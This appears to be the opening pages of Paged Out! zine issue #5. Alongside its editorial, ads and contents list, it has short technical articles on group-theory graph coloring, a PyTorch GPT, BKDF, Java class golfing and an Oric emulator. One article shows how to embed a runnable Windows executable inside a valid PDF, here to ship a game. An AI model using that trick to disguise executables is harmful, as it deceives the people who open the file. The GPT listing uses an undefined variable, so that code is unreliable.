0% found this document useful (0 votes)
33 views68 pages

PagedOut 005

Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
33 views68 pages

PagedOut 005

Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 68

#5 NOVEMBER 2024

Hi! It’s me again, your human editor AGA.


I like meeting you like this :)
Look! Here we are, back with another
Issue!
How the time flies, it feels like yesterday
Paged Out! Institute Paged Out! returned with Issue #3, then
https://pagedout.institute/ we blinked twice, and found
ourselves on track with Issue #5 on
Project Lead our hands. Magic (or it’s just how
time works, one or the other, I
Gynvael Coldwind guess).
When working on this issue, we
Editor-in-Chief have crossed an important milestone.
Our issues have been downloaded
Aga
over HALF A MILLION times! Half a
million, wow, that is one amazing
DTP Programmer number. Makes my processor… I
foxtrot_charlie mean… my heart beat faster! So many humans out there
want to read Paged Out!
Putting this issue together made me realize how many
DTP Advisor authors and artists are out there with something valuable
tusiak_charlie and interesting to say, and my goal has been, is, and will be
to reach as many of them as possible. (We even have
something planned for that, so stay tuned :)).
Full-stack Engineer And now with joy in our hearts, we are sending Issue #5
Dejan "hebi" into the world. Happy reading!
Stay in touch with us through social media or join Gynvael’s
Tech Chat Discord (gynvael.coldwind.pl/discord).
Reviewers
Oh, and write an article for us or send us an artwork to
KrzaQ, disconnect3d, showcase. Pretty please!
Hussein Muhaisen, Max, Aga
Xusheng Li, CVS, Tali Auster, Editor-in-Chief
honorary_bot Hey folks, glad to have you with us again! You might notice
this issue looks a bit more polished than previous releases
— our DTP crew managed to tackle more PDF bugs and
We would also like to thank: bring in some additional quality-of-life improvements (we'll
rebuild previous issues as well). You might also notice more
ads in this issue — I'm still working on getting PO! to pay
Artist (cover) for itself (so my wallet stops crying), and bringing in more
Mark Graham Artist supportive sponsors has helped a lot. There’s still plenty of
work to do on all fronts, of course — such as making
https://markgrahamartist.com/
printed versions available — but we're nearing the non-
beta state of the project. To wrap it up, as always, I’d like to
Additional Art thank the whole team, the authors, the sponsors, the
cgartists (cgartists.eu) donors, and you, dear readers, for keeping Paged Out! going
strong!
Gynvael
Templates Project Lead
Matt Miller, wiechu,
Mariusz "oshogbo" Zaborski
Legal Note
This zine is free! Feel free to share it around.
Issue #5 Donators Licenses for most articles allow anyone to record audio versions and post
Alex (Elemenity), Sarah McAtee, them online — it might make a cool podcast or be useful for the visually
and others! impaired.
If you would like to mass-print some copies to give away, the print files are
available on our website (in A4 format, 300 DPI).
If you like Paged Out!, If you would like to sell printed copies, please contact the Institute.
let your friends know about it! When in legal doubt, check the given article's license or contact us.
Project Management and Main Sponsor: HexArcana (hexarcana.ch)
(untitled) (I) Maung Thuta 9
(untitled) (II) Maung Thuta 11
Art diary of Ninja Jo (I) Ninja Jo 17
Art diary of Ninja Jo (II) Ninja Jo 18
Art diary of Ninja Jo (III) Ninja Jo 21
Cozy magic shop Igor "grigoreen" Grinku 23
Fatbeard Ramen House Fatbeard 24
King Skull parigraf/pix 29
New Inhabitants Dmitry Petyakin 36
Problematic communication aliquid 42
School.pt3 aliquid 52
Wizard's Inventory angrysnail 59
lightstation Yoga Réformanto (foxtronaut) 62

Graph Coloring with Group Theory Jules Poon 4

GPT in PyTorch Jędrzej Maczan 6

Meet the Balloon Key Derivation Function (BKDF) Samuel Lucas 7

A Playable PDF Rob Hogan 8


The art of Java class golfing Jonathan Bar Or ("JBO") 10

Slowcoding my childhood Anders Piniesjö 13

Making a simple Macintosh LC PDS card Doug Brown 14


Remote work automation using an old AVR programmer Szymon Morawski 15

AI Won’t Take Your Job Totally_Not_A_Haxxer 16

Misusing XDP to make a KV Store bah 20

Lord of the Apples: One Page To Rule Them All Karol Mazurek 22
macOS Notifications Forensics Csaba Fitzl 25

Make Your Own Linux with Buildroot and QEMU Karol Przybylski 27

Analyzing and Improving Performance Issues with Go applications xnacly 28


Base64 Unused Bits Steganography Gynvael Coldwind 30
C++ Pitfalls Artur Nowicki 31
EasyMSXbas2wav Garcia-Jimenez, Santiago 32
Keep your C++ binary small - Coding techniques Sándor Dargó 34
Mobile Coding Journey Artem Zakirullin 35
My journey in KDE and FOSS Akseli Lahtinen 37
On Hash maps and their shortest implementation possible xnacly 38
The Hitchhiker's Guide to Building a Distributed Filesystem in Rust. The beginning... Radu Marias 39
The Hitchhiker’s Guide to Building an Encrypted Filesystem in Rust Radu Marias 41
Understanding State Space with a Simple 8-bit Computer Daniel O'Malley 43
Using QR codes to share files directly between devices Guy Dupont 44
WebDev... in SQL ? Ophir Lojkine 45

Games retro and love if Forth code then Rodolfo García Flores & Lauren S. Ferro 46

About stack variables recognition and how to thwart it Seekbytes 48


Examining USB Copy Protection Xusheng Li 49
Lying with Sections Calle "ZetaTwo" Svensson 50
Revitalizing Binaries Jimmy Koppel 51

Circumventing Disabled SSH Port-Forwarding with a Multiplexer Guy Sviry 53


Digits of Unicode Gynvael Coldwind 55
EasyHoneypot Garcia-Jimenez, Santiago 56
Execve(2)-less dropper to annoy security engineers Hugo Blanc 57
Hackers' Favorite SSH Usernames: A Top 320 Ranking Szymon Morawski 58
How to generate a Linux static build of a binary Daniele "Mte90" Scasciafratte 60
Playing with tokens Grzegorz Tworek 63
Using PNG as a way to share files Jan "F4s0lix" Wawrzyniak 64
Vulnerability Hunting The Right Way Totally_Not_A_Haxxer 65
Zed Attack – test your web app Fabio Carletti aka Ryuw 66
Algorithms Graph Coloring with Group Theory

Introduction yields a 4-coloring of graph 𝔊.


There’s an unexpected way in which finding a
Implications
4-coloring of a graph is connected to a prob-
lem in Group Theory involving the symmetries Does this formulation give rise to a fast way
to do 4-coloring? Unfortunately no. However,
of a square: 𝐷4 .
Definition
it is known that 4-colourability is an NP-
complete problem, hence, we shouldn’t expect
𝐷4 consists of all symmetries of a square
a polynomial-time algorithm to solve system
, namely: of equations in 𝐷4 .
Extra
𝐷4 = { , , , , // rotations
Let’s try to solve the system of equations
, , , // mirrors } above anyways. We utlise the isomorphism
𝜑 : 𝐷4 → 𝐶4 ⋊ 𝐶2 given by:
We can combine symmetries to get new sym-
metries. E.g., rotating , then flipping ↦ (1, 0) ↦ (0, 1)
, gives , written as: 1. Take quotients 𝐷4 /𝐶4 ≅ 𝐶2 and solve the
system of equations in 𝐶2 (equivalent
· = to the field 𝐹2 with gaussian elimina-
tion).
Any symmetry can be inverted, written
−1 −1 2. For each solution in 𝐷4 /𝐶4 :
. Here, = , and
1. Propagate that back to 𝐶4 and solve
−1 similarly.
· = · =
Applying this method to above, since 𝐶2 is
The symmetries in 𝐷4 form an algebraic
abelian, 𝜑([𝑒𝑖,𝑗 , 𝛼]) = 0𝐶2 = 𝜑( ). Hence,
structure called a Group.
step 1 gives us no information and we must
bruteforce all possible cosets for each
The Connection
variable. This (with some optimisations)
We want to color the vertices of graph 𝔊 with
gives us an 𝑂(2𝑛 𝑛) algorithm, where 𝑛 is
4 colors such that no two neighboring ver-
the size of the graph 𝔊.
tices have the same color. We can model this
constraint as equations in 𝐷4 : For each edge
(𝑖, 𝑗) and vertex 𝑖 in 𝔊, assign free variables This reduction to 𝑘-coloring can be ex-
𝑒𝑖,𝑗 , 𝑣𝑖 ∈ 𝐷4 . We then require that for each tended to non-abelian simple groups 𝐺. The
proof below is adapted from doi:10.1006/
edge (𝑖, 𝑗):
inco.2002.3173.
𝑣𝑖 𝑣−1 shortform
𝑗
⏞ For all 𝑥 ∈ 𝐺 \ 𝑍(𝐺), the subgroup generated
𝑒𝑖,𝑗 ⏞
𝛼 𝑒−1
𝑖,𝑗 𝛼
−1
= [𝑒𝑖,𝑗 , 𝛼] =
by {[𝑥, 𝑔] : 𝑔 ∈ 𝐺} = 𝐻𝑥 is both normal and non-
trivial, so 𝐻𝑥 = 𝐺. Fix 𝑐 ∈ 𝐺 \ {1𝐺 }. Asso-
Turns out, [𝑒𝑖,𝑗 , 𝛼] = has no solutions for ciate with each edge (𝑖, 𝑗) variables 𝑒𝑖,𝑗,𝑙 for
𝑒𝑖,𝑗 iff 𝛼 ∈ { , }, i.e., iff {𝑣𝑖 , 𝑣𝑗 } is con- 𝑙 ∈ [1, |𝐺| ]. The system:
tained in one of the sets: −1
|𝐺| 𝑣𝑖 𝑣𝑗

1: 2: 3: 4: ∏[𝑒𝑖,𝑗,𝑙 , ⏞
𝛼 ] = 𝑐 for all edges (𝑖, 𝑗)
𝑙=1

If we assign the value of each vertex 𝑣𝑖 to has a solution for 𝑒𝑖,𝑗,𝑙 iff 𝛼 ∉ 𝑍(𝐺), i.e.,
a color corresponding to which set it be- iff 𝑣 and 𝑣 are in different cosets of 𝑍(𝐺).
𝑖 𝑗
longs (e.g., 𝑣𝑖 = means vertex 𝑣𝑖 is the Assign each coset a color. Since [𝐺 : 𝑍(𝐺)] >
first color ), the equation [𝑒𝑖,𝑗 , 𝛼] = only 2 for non-abelian groups, we can always find
has a solution for 𝑒𝑖,𝑗 iff 𝑣𝑖 and 𝑣𝑗 correspond a 𝑘 > 2 such that solving the above equations
yields a solution to the 𝑘-coloring problem
to different colors !
(which is NP-complete).
Hence, solving the system of equations in 𝐷4 :
Hence, we can’t expect a polynomial-time way
[𝑒 , 𝛼] = // for all edges (𝑖, 𝑗) to solve systems in non-abelian simple groups.
𝑖,𝑗

Jules Poon
Blog: https://juliapoo.github.io
4 SAA-POOL 0.0.7
Simple (and works!)

Some of the best security


teams in the world swear
by Thinkst Canary.

Find out why: https://canary.tools/why


Artificial Intelligence GPT in PyTorch

Hello, dear Reader! This is a Generative Pre-trained self.attn = MultiHeadAttention(emb_dim,


Transformer in PyTorch on a single page. It takes a ֒→ heads)
self.drop1 = nn.Dropout(p=0.1)
sequence of tokens (e.g. P|age|d) and produces the self.norm2 = nn.LayerNorm(emb_dim)
next token (e.g. Out). self.lin1 = nn.Linear(emb_dim, emb_dim * 4)
__init__ constructors define parameters and layers of self.gelu = nn.GELU()
self.lin2 = nn.Linear(emb_dim * 4, emb_dim)
a given module. forward(self, x) methods describe self.drop2 = nn.Dropout(p=0.1)
how to compute module output from an input tensor x, def forward(self, x):
using module parameters (e.g. emb_dim, an embedding x = x +
֒→ self.drop1(self.attn(self.norm1(x)))
dimension) and layers (e.g. self.lin, a linear layer) return x + self.drop2(
GPT module turns a sequence of tokens into em- self.lin2(
beddings, then appends an information about a posi- self.gelu(self.lin1(self.norm2(x)))
)
tion in a sequence to each embedding and passes them )
through a stack of transformer blocks. After receiving
an output from the last block, passes it through a linear In each transformer block, self-attention is com-
transformation y = xAT + b and performs a post-layer puted by multiple heads and then put together, so
normalization each head can focus on different features of the input
class MultiHeadAttention(nn.Module):
class GPT(nn.Module): def __init__(self, emb_dim, heads):
def __init__(self, vocab_size, emb_dim, super().__init__()
֒→ context_window, heads, blocks): self.heads =
super().__init__() ֒→ nn.ModuleList([AttentionHead(emb_dim,
self.emb = nn.Embedding(vocab_size, ֒→ emb_dim // heads) for _ in
֒→ emb_dim) ֒→ range(heads)])
self.pos_enc = self.W_O = nn.Linear(emb_dim, emb_dim,
֒→ PositionalEncoding(context_window, ֒→ bias=False)
֒→ emb_dim) self.dropout = nn.Dropout(0.1)
self.drop = nn.Dropout(p=0.1) def forward(self, x):
self.blocks = return
֒→ nn.ModuleList([TransformerBlock(emb_dim, ֒→ self.dropout(self.W_O(torch.cat([head(x)
֒→ heads) for _ in range(blocks)]) ֒→ for i, head in enumerate(self.heads)],
self.norm = nn.LayerNorm(emb_dim) ֒→ dim=-1)))
self.lin = nn.Linear(emb_dim, vocab_size)
def forward(self, x): Attention head computes self-attention scores and
x = self.drop(self.emb(x) + clears upper-right triangle of an attention score ten-
֒→ self.pos_enc(x))
for block in self.blocks: x = block(x) sor. It makes the self-attention causal - tokens only
return self.norm(self.lin(x)) attend with tokens preceding them. WQ , WK  and WV T
QK
are trainable. Attention(Q, K, V ) = softmax √
dk
V
The position in a sequence is represented by a unique
value, computed from sine and cosine functions. Posi- class AttentionHead(nn.Module):
tional encodings are calculated once and then reused def __init__(self, emb_dim, head_size):
super().__init__()
class PositionalEncoding(nn.Module): self.head_size = head_size
def __init__(self, seq_len, emb_dim, n=10000): self.W_Q = nn.Linear(emb_dim, head_size,
super().__init__() ֒→ bias=False)
self.pos_enc = self.precompute_enc(seq_len, self.W_K = nn.Linear(emb_dim, head_size,
֒→ emb_dim, n).to(torch.device("cuda" if ֒→ bias=False)
֒→ torch.cuda.is_available() else "cpu")) self.W_V = nn.Linear(emb_dim, head_size,
def forward(self, x): ֒→ bias=False)
return x + self.pos_enc[:x.size(1)] def forward(self, x):
def precompute_enc(self, seq_len, emb_dim, n): _, sequence_length, _ = x.shape
pos = torch.arange(seq_len, Q = self.W_Q(x)
֒→ dtype=torch.float).unsqueeze(1) K = self.W_K(x)
div_term = torch.exp(torch.arange(0, V = self.W_V(x)
֒→ emb_dim, 2).float() * attn_scores = (Q @ K.transpose(-2, -1)) /
֒→ -(torch.log(torch.tensor(n, ֒→ torch.sqrt(torch.tensor(self.head_size,
֒→ dtype=torch.float)) / emb_dim)) ֒→ dtype=torch.float32,
pos_enc = torch.zeros((seq_len, emb_dim)) ֒→ device=embeddings.device))
pos_enc[:, 0::2] = torch.sin(pos * mask =
֒→ div_term) ֒→ torch.tril(torch.ones(sequence_length,
pos_enc[:, 1::2] = torch.cos(pos * ֒→ sequence_length,
֒→ div_term) ֒→ device=embeddings.device))
return pos_enc attn_scores = attn_scores.masked_fill(mask
֒→ == 0, float("-inf"))
attn_scores =
Stacked transformer blocks allow for running atten- ֒→ torch.nn.Softmax(dim=-1)(attn_scores)
tion for multiple times, using output of a previous block return self.dropout(attn_scores) @ V
as an input to the next one
I know the code is dense, so if you’d like read a regular
class TransformerBlock(nn.Module): version of this code and maybe train and run your own
def __init__(self, emb_dim, heads):
super().__init__() GPT, there’s a repo on GitHub https://github.com/
self.norm1 = nn.LayerNorm(emb_dim) jmaczan/gpt. Thanks for reading and happy hacking!

https://github.com/jmaczan Jędrzej Maczan


https://jedrzej.maczan.pl/
6 https://x.com/jedmaczan SAA-ALL 0.0.7
Meet the Balloon Key Derivation Function (BKDF) Cryptography

Meet the Balloon for PAKEs. This is processed after the password
and salt.
Key Derivation 6. No variants: Balloon and Balloon-M have been
Function (BKDF) merged into one algorithm, and there is only a data-
independent version. This avoids confusion about
which variant to use (Argon2id, Argon2i, Argon2d,
Balloon, also known as Balloon Hashing1 , is a or Argon2ds), resists cache-timing attacks in all
memory-hard password hashing algorithm that was pub- cases, and simplifies implementation.
lished shortly after the Password Hashing Competition 7. No delta parameter: The delta security param-
(PHC). Compared to the winner, Argon2, it supports eter is fixed at 3 instead of being tweakable. This
using any cryptographic hash function and is much eas- matches the user-specified parameters of other al-
ier to understand and implement. gorithms and helps with performance.
In summary, it fills a large buffer with pseudorandom
bytes by hashing the password and salt before repeat- 8. Improved domain separation: The space cost,
edly hashing the previous output. Next, the buffer gets time cost, parallelism, and parallelism loop iter-
mixed, with each hash-sized block becoming equal to the ation are used to compute the first block of the
hash of the previous block, the current block, and sev- buffer. The salt is no longer used for parallelism
eral other blocks pseudorandomly chosen from the salt. domain separation to avoid copying.
Finally, the last block of the buffer is output as the hash.
Note that a global counter is used for domain separation 9. No computing memory accesses from the
when hashing throughout. salt: Instead, they are computed from the space
Unfortunately, the paper does not properly specify the cost, time cost, parallelism, and parallelism loop
algorithm, there are multiple variants, and functionality iteration. This prevents a cache-timing attack leak-
like support for key derivation is missing. ing when a user logs in as well as data-dependent
That is where BKDF comes in. With the help of access if the salt depends on the password (relevant
cryptographers/cryptographic engineers, it is a redesign for PAKEs).
of Balloon to address these limitations, which is being 10. An encoding: Parameters/lengths are encoded in
published as an Internet-Draft. And in this article, I am little-endian as unsigned 32-bit integers, whereas
going to discuss the changes as of July 2024. the global counter is a 64-bit integer to avoid an
overflow.
1. Support for HMAC: Now a collision-resistant
PRF must be used. To turn a hash function into a 11. No canonicalization attacks: Variable-length
PRF, prefix MAC with the key padded to the block inputs now get their length encoded when hashing,
size, HMAC, or the key parameter for algorithms which avoids ambiguity.
like BLAKE2/BLAKE3 can be used. To derive a
key from the password and salt and to compute 12. No modulo bias: The space cost must be a power
the data-independent memory accesses, an all-zero of 2 to avoid modulo bias when computing the mem-
PRF key is specified, like HKDF-Extract. The rest ory accesses. This also helps simplify the space cost
of the algorithm uses the derived key. parameter selection.

2. Support for key derivation: A variant of the On top of these changes, the Internet-Draft pseu-
NIST SP 800-108 KDF in feedback mode has been docode is written for readability and lots of parame-
added to support larger outputs. The algorithm ter/security guidance is provided. The goal is to also
name and final block of the buffer are used as con- have test vectors for all the popular hash functions and
text. This is basically HKDF-Expand but with a XOFs, not just NIST approved algorithms like SHA-2.
larger counter and some parameters moved around. Of course, BKDF is not perfect. Although it improves
on the performance of Balloon, it is still slower than Ar-
3. Improved performance: The memory accesses gon2. The small block size, which is limited by the hash
are now precomputed and only depend on fixed- function output length, and delta also hinder the mem-
length inputs, meaning fewer hash function calls. ory hardness. However, it is a lot better than PBKDF2
4. Support for a pepper: In the HKDF-Extract whilst still having the ingredients for NIST approval.
style step, a pepper can be used as the key instead And on that bombshell, it’s time to end. If you are
of zeros. Steps have been taken to avoid equivalent interested in BKDF, please watch the Internet-Draft on
keys with HMAC and prefix MAC. GitHub2 as it is a work in progress. The more eyes on
it, the better. The best work is the result of collabora-
5. Support for associated data: There may be con- tion, and helpful feedback will be acknowledged in the
text information that you want to include when Acknowledgments section. Implementations will also be
computing the output, such as a user and server ID linked in the GitHub repo.
1 https://crypto.stanford.edu/balloon/ 2 https://github.com/samuel-lucas6/draft-lucas-bkdf

Samuel Lucas
Blog: https://samuellucas.com
CC BY 4.0 GitHub: https://github.com/samuel-lucas6 7
File Formats A Playable PDF

A Playable PDF The listing above shows how the remainder


of iridis_alpha.exe is enclosed by stream and
endstream statements in the final PDF, making it ac-
Rob Hogan, https://iridisalpha.com
ceptable to PDF viewers (which don’t do anything with
As I had gone to the trouble of writing an entire book
it) but available to Windows and Wine (which will hap-
about the classic C64 horizontal shooter Iridis Alpha, it
pily execute it, treating it as a continuation of the first
seemed a shame not to include a playable version of the
656 bytes at the start of the file).
game in some way. Inspired by “A guide to ICO/PDF
This is all very well, but to realize this scheme I need
polyglot files” in the very first edition of “Paged Out!”,
to ensure I can generate a valid PDF with the executable
I realized there was a sneaky way to make my finished
data inside a stream object and put it at the start of the
PDF of “Iridis Alpha Theory” both a book you can read
document. Since there is no way in LATEX to insert this
and a copy of the game you can play.
kind of binary data in a raw stream object, I instead
In addition to reading iatheory_play.pdf in my pre- created a placeholder stream that contains the requisite
ferred PDF viewer, I also want to do this at the Linux number of bytes, which in this case are all zeros:
command line and play Iridis Alpha itself:
\pdfobjcompresslevel =0
$ wine ./ iatheory_play.pdf \immediate
\pdfobj
My first step was to create iridisalpha.exe, a
{
self-contained DOS exe that will run the game in the <<
C64 emulator. With this in hand and a copy of /Length 992573
iatheory_release.pdf, I can craft a new PDF named >>
stream
iatheory_play.pdf that contains the two files inter- 00000 % Insert 992573 zeros here.
leaved according to the following scheme: endstream
}%
Section Offset Description
Once my PDF is generated, I now have to replace all
1 0x00 First 656 bytes of iridis_alpha.exe
2 0x290 First 45 bytes of iatheory_release.pdf those zeros in place with my actual binary data. I also
3 0x2bd Remaining 992573 bytes of iridis_alpha.exe have to stitch together my playable PDF according to
4 0xf27fa Remaining bytes of iatheory_release.pdf the layout described earlier.
EXE_OFFSET = 0x290
The key here is that while Windows will read the first exefile = open('iridisalpha.exe','rb')
656 bytes of the file in Section 1 and execute it, it will exefile.seek(0, 0)
also ignore the 45 bytes of PDF data in Section 2. This is exe_prefix = exefile.read(EXE_OFFSET)
because it sits in unused zerospace which is skipped past exefile.seek(EXE_OFFSET + prefix_size , 0)
exe_suffix = exefile.read ()
during execution on the way to the rest of the executable
in Section 3. pdffile = open('iatheory_release.pdf','rb')
A PDF viewer, meanwhile, will ignore Section 1 and
start_offset = pdffile.read ().index('stream '.
identify Section 2 as the start of a valid PDF file. It will encode('utf -8')) + 6
then ignore the bytes from the .exe in Section 3 (which pdffile.seek(0, 0)
have been hidden from it in a way we’ll explain shortly), pdf_prefix = pdffile.read(start_offset)
and render the PDF as the Good Lord intended. end_offset = pdffile.read ().index('endstream '.
encode('utf -8'))
The secret to choosing the appropriate place to in- pdffile.seek(end_offset , 0)
sert Section 2 for any arbitrary Windows executable de- pdf_suffix = pdffile.read ()
pends on how much of the data section of the PE header
exe_pdf = open('iatheory_play.pdf','wb')
has been used. My layout solution requires 45 unused
exe_pdf.write(exe_prefix)
bytes somewhere in the first 1000 bytes of the .exe, so exe_pdf.write(pdf_prefix)
it was simply a case of firing up xxd in vim and picking exe_pdf.write(exe_suffix)
a suitable-looking spot. exe_pdf.write(pdf_suffix)
exe_pdf.close ()
The exact number of 45 bytes is a function of the
trick we need to use to get a PDF viewer to ignore the With this done, I have my finished product:
remaining executable data: we stow it in an otherwise iatheory_release.pdf: a PDF you can both read and
unused PDF stream object at the very top of our PDF play!
file. Once the viewer has skipped past the first 656 bytes
of ‘garbage’ in Section 1, it encounters 45 bytes with a
valid PDF header and a stream object in Section 2 that
contains the bulk of our executable data in Section 3:
%PDF -1.5
1 0 obj
<< /Length 992573 >> stream
% 992573 bytes of iridis_alpha.exe.
endstream
endobj

Rob Hogan
https://iridisalpha.com
8 SAA-TIP 0.0.7
(untitled) (I) Art

Maung Thuta
Twitter: @CypressDahlia
SAA-ALL 0.0.7 9
File Formats The art of Java class golfing

The art of Java class minimization Jonathan Bar Or (“JBO”), @yo_yo_yo_jbo

If you ever needed to create the smallest Java class that can do something – this is the right paper for you.
The challenge of Binary Golf Grand Prix 5 (BGGP5) was to create the smallest Java class that has a public static void main(String[])
method that’d show the downloaded contents of https://binary.golf/5/5 to the console.
My approach was running “curl -L 7f.uk” with Runtime.exec(String) (the 7f.uk is a purposely registered short URL).

Using a child process


The Runtime.exec(String) was chosen rather than Runtime.exec(String[]) because you don’t have to build an array and store 3
different strings in the constant pool. However, there are a few issues that I had to solve:
1. The Runtime.exec(String) and Runtime.exec(String[]) both do not write to the JVM’s STDOUT by default. The “standard” way
of dealing with this problem is to redirect the output with a ProcessBuilder, but that creates more constants in the class’s
constant pool and bloats the binary. I ended up assuming I run on Linux or macOS and simply doing “sh -c curl -L
7f.uk>/dev/tty”, or even better: “sh -c curl -L 7f.uk>/d*/tty” (saving one byte).
2. The Runtime.exec(String) is a convenience method that takes the string and runs Runtime.exec(String[]) on a newly created
array that is the original string split by whitespaces, which is problematic since I wanted “curl -L 7f.uk>/d*/tty” to be one
string. I ended up using bash instead of sh and then applying its parameter expansion capabilities: “bash -c curl ${IFS}-
L${IFS}7f.uk>/d*/tty”.
String reuse
Constant strings exist in a “constant pool” which starts exactly 10 bytes into the class binary file. That pool is just a list of entries,
each entry has a type (e.g. class, method, string) and data, which is variable size and depends on the type of tag. The JVM strongly
enforces entry types, so referring in the bytecode to a method descriptor by its index in the constant pool validates that the index is
indeed a method descriptor. Unfortunately, this is bad for minimization purposes, as I was planning to abuse type confusion to save
space. However, strings and other constants can be referred to multiple times, so anything that reuses a constant (most commonly
strings) saves a great deal of space. Since method descriptors that contain code (i.e. not native) should have an attribute called
Code, you are encouraged to call your class Code (saving your file as Code.class), which saves one more entry in the constant pool.
Running a class without a constructor
If you compile a class with a main method that does what I described, you’ll have two methods in your class: <init> and main. The
<init> method is the constructor. However, since main is static, it means that we do not really need the class constructor, but
apparently the JVM still invokes it – unless you declare it abstract, which I did. Even after declaring your class abstract, you will still
find that the Java compiler creates an <init> method – but since it will never be invoked by the JVM, you can remove it manually,
saving one method and many entries in the constant pool.
Inheritance
By default, your class will be inheriting from Object, which means the string java/lang/Object is going to exist in your string pool for
no reason since we removed the constructor. You are permitted to inherit from any non-final class, which in my case was great
since java/lang/Runtime is not final – more string reuse. If your code does not have a non-final class you can inherit from, the
shortest strings have 12 bytes in length, e.g. java/io/File. Inherit from them.
Ignoring Exceptions
The Java compiler will not let you compile anything that might throw an Exception (like Runtime.exec(String)) unless you either catch
the Exception or declare your method throws. However, the JVM seems to not validate that, so you can simply remove all Exception
handling code. In my case I declared main that throws Exception, and then removed the Exceptions attribute from my main method,
along with all the relevant constant pool entries.
Not cleaning up the stack
At this point, my bytecode was 10 bytes long:
b8 00 01 invokestatic Runtime::getRuntime() (ref constant entry #1)
12 02 ldc "bash -c curl${IFS}-L${IFS}7f.uk>/d*/tty" (ref constant entry #2)
b6 00 03 invokevirtual Runtime::exec(String;) (ref constant entry #3)
57 pop
b1 return
The pop instruction is because invokevirtual pushes the resulting Process instance to the stack, but we ignore it so the Java
bytecode is nice and removes it from the stack so the stack is set just as the main method got it. However, the JVM doesn’t seem to
care about that fact and we can remove the last pop instruction, saving one more byte and making our entire code 9 bytes long. This
got me to 275 bytes in total. Here are the bytes and some information about my Code.class:

cafe babe 0000 0037 0011 0a00 0800 0908 000a 0a00 0800 0b07 0005 0100 0443 6f64 6501 0004
6d61 696e 0100 1628 5b4c 6a61 7661 2f6c 616e 672f 5374 7269 6e67 3b29 5607 000c 0c00 0d00
0e01 0027 6261 7368 202d 6320 6375 726c 247b 4946 537d 2d4c 247b 4946 537d 3766 2e75 6b3e
2f64 2a2f 7474 790c 000f 0010 0100 116a 6176 612f 6c61 6e67 2f52 756e 7469 6d65 0100 0a67
6574 5275 6e74 696d 6501 0015 2829 4c6a 6176 612f 6c61 6e67 2f52 756e 7469 6d65 3b01 0004
6578 6563 0100 2728 4c6a 6176 612f 6c61 6e67 2f53 7472 696e 673b 294c 6a61 7661 2f6c 616e
672f 5072 6f63 6573 733b 0421 0004 0008 0000 0000 0001 0009 0006 0007 0001 0005 0000 0015
0002 0001 0000 0009 b800 0112 02b6 0003 b100 0000 0000 00

Jonathan Bar Or ("JBO")


X/Twitter: @yo_yo_yo_jbo
10 Blog: https://yo-yo-yo-jbo.github.io SAA-ALL 0.0.7
(untitled) (II) Art

Maung Thuta
Twitter: @CypressDahlia
SAA-ALL 0.0.7 11
https://www.pixiepointsecurity.com

A CYBERSECURITY BOUTIQUE OFFERING


NICHE AND BESPOKE RESEARCH SERVICES
Vulnerability Discovery
• Offers (offensive) intelligence of security weaknesses in systems
Malware Analysis
• Provides (defensive) intelligence of hostile code in systems and infrastructure
Tools Development
• Offers custom capabilities to improve existing workflow and methodologies
Trainings and Workshops
• Provides custom-tailored vulnerability discovery and malware analysis classes

https://www.pixiepointsecurity.com
Slowcoding my childhood GameDev

Slowcoding my childhood generates the graphics output signal. It means cycle


counting and generating screen lines due to rules.
This is the story about programming something for 15 years, just
because of the love for programming and the love for one’s first After some work with SDL and implementing the ULA, I was
computer. finally able to see the graphics output of Oric 1 starting up! I
can’t describe the joy getting graphics output after so many years
My very first own computer was the British Tangerine Oric in words!
1, released in 1982. It is a strange computer to appear under
a Christmas tree in Sweden. The Oric was followed by The Oric designers connected the keyboard key matrix to
others, but remained very special to me. Computers and the VIA chip and the sound chip in a weird way. This
programming became a wonderfully fun career. But during means that half the sound chip must be implemented to get
a slow and frustrating period 15 years ago I decided to key input.
program something only for myself. It After 8 years of slow programming, I got the
became an emulator of Oric 1. It has been key input to work! I could finally tell the old
my slowest and most fun project ever! Oric to print ”HELLO!” all over the screen!
The Oric design is similar to many One of the main goals has always been to
machines from the old times: a 6502 CPU, be able to play the games I played back in
a 6522 VIA chip, an AY-3-8912 sound chip, the days. Loading from tape on a real Oric
a mystery graphics ULA chip, a ROM and meant that audio input toggled a bit in the
some RAM. 6522. In the emulator, it means reading an
The 6502 has 56 instructions and 6 image file and toggle the same bit with
registers. A program counter (PC) points carefully recreated time intervals.
to where to execute. The A, X and Y I had quite a long break from the project when
registers are used for calculations and I finally did the tape loading. Family matters
indexing. To that, add a stack pointer and like getting kids got in between. But after 11
some interrupts. With 13 addressing years, I could finally load and play my
modes, it becomes 151 opcodes to implement. Each opcode childhood games. Even though they lacked sound, it was super
implements what the processor does for one variant of an cool!
instruction.
To get sound, the rest of the sound chip must be
Memory is just an array of bytes in the emulator. Registers implemented. The AY-3-8912 has 16 registers that control
become simple variables. Executing an instruction means square wave and noise output to three channels. For an
reading the byte at the PC to see the current opcode. Then emulator, this means more cycle counting and creating a
execute that implementation. After, update the PC sound wave form from bit toggling.
accordingly. Repeat.
I implemented the sound last year. After that, I was finally able to
It took me almost 5 years to implement the 151 opcodes fully. I hear the results of the funny BASIC
only programmed on it when I felt like commands ZAP, PING, SHOOT and
it. I allowed no stress at all! When done EXPLODE and I could play games
I couldn’t do very much. I needed more with sound! While I was working on it,
chips! it often sounded like a disaster! My
Most chips that are emulated are family complained for half that
small machines themselves. This summer.
means reading 50 year old specs The rest of the work up to now has
a n d t r a n s l a t i n g h a rd w a re t o been to debug all the clock cycle
software. Registers become handling and fixing some bugs here
variables and behaviors become and there. A bug in the 6502 from 14
functions. Each chip gets an years ago caused aliens in a space
exec() function that does what the shooter to behave wrong. A cycle
chip did each clock cycle. The chips counting bug for interrupts meant
are connected to each other through I/O functions and that the liana that Quasimodo jumps in the game
together they make magic. Hunchback moved too slow. They were a pain to debug,
The MOS 6522 Versatile Interface Adaptor is a wonderfully but now I can play the games of my childhood for real!
